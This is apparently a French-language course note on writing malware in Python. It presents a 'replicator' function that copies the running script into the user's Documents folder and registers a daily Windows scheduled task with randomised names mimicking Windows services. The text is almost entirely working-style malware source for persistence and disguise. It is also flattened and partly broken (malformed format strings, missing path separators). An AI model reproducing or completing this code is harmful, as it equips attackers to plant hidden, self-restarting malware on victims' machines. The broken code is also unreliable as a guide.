Cours 3 MW Python

Malware

II. Replicator

 Definir la commande replicator()

def replicator():
thisfile_plus_loc = argv[0]

getenv = subprocess.Popen(["powershell.exe", "echo $Env:USERPROFILE"], stdout=subprocess.PIPE, shell=True)
(threee,fourr) = getenv.communicate()
env = threee.decode()
env = env.replace("\\", "/")
env = env.replace("\n","")


thisfile_plus_loc = thisfile_plus_loc.replace("\\","/")

dirlist = ['/Document']

for k in dirlist:
dirName = env + k
wordsgen = random.choices(string.ascii_lowercase, k=4)
descgen = random.choices(string.ascii_uppercase, k=3)
timegen = random.choices([1,2,3,4,5,6,7,8,9,10,11])
wordsgen = ''.join(wordsgen)
wordsgen = "WIN" + wordsgen
descgen = ''.join(descgen)
descgen = "Windows" + descgen + "service"
descgen = descgen.replace(" ", "")
timegen = str(timegen)

 

III. Essaye execute/error

Erreur et execute pour replicator()

try:
doreplicate = subprocess.Popen(["powershell.exe", "cp '{0}''{1}'".format(thisfile_plus_loc, dirName)],
stdout=subprocess.PIPE, shell=True)
(six,seven) = doreplicate.communicate()
repltwo = six.decode()
print("[!] Copy outputs:",repltwo)
filename = argv[0].split("\\")
filename = filename[-1]
programloc = dirName + filename

command = "$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '{0'; " \
"$trigger = New-ScheduledTaskTrigger -Daily -At{1}am; " \
"Register-ScheduledTask -Action $action -Trigger $trigger -TaskName '{2}' -Description'{3}'"\
.format(programloc,timegen,wordsgen,descgen)

schedd = subprocess.Popen(["powershell.exe", command], stdout=subprocess.PIPE, shell=True)
(eight,nine) = schedd.communicate()
reply = eight.decode()
print("[$] Schedule respons:", reply)

except Exception as dirserror:
print("error:", dirserror)
print("[+] Done.")